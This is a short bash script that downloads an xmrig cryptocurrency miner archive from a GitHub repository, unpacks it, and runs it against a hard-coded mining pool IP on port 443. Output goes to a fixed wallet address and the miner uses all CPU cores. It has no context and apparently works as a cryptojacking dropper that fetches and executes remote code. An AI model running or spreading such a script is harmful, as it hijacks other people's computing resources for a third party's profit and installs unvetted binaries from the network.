#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.104.187.239:443 -u ZEPHsC8NRWvUF6d5nhDPrgHfPdciPramdeHnZCBoEtNTedQEP6R3FPDXet83q96Q9BD7S8BhMqmx5j3HH7o6ngschqMma4kYccy -p new -a rx/0 -t $(nproc --all)
